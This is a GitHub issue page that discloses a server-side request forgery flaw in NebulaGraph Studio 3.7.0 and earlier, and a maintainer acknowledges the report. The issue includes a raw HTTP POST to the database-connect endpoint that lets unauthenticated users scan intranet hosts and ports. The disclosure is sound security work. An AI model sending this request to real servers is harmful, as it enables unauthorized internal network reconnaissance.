Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

NebulaGraph Studio has SSRF vulnerability #571

Open
godway111 opened this issue Jun 8, 2023 · 1 comment
Open

NebulaGraph Studio has SSRF vulnerability #571

godway111 opened this issue Jun 8, 2023 · 1 comment

Comments

@godway111
Copy link

godway111 commented Jun 8, 2023

Describe the bug (must be provided)

The NebulaGraph Studio login interface provides the function of connecting to NebulaGraph. Unauthorized users can request the IP address and port of the intranet host through the target website for intranet detection.

Your Environments (must be provided)

  • NebulaGraph Studio ≤ 3.7.0

How To Reproduce(must be provided)

Steps to reproduce the behavior:

Step1. Send request
`POST /api-nebula/db/connect HTTP/1.1
Host: xxxx.com
Content-Length: 47
Accept: application/json, text/plain, /
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36
Content-Type: application/json
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

{"address":"x.x.x.x","port":prot}`

Step2. View Response
The open ports of the intranet server can be seen through the response and status code:
image

@wey-gu
Copy link
Contributor

wey-gu commented Jun 8, 2023

Thanks a lot, @godway111 for reporting this!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
Development

No branches or pull requests

2 participants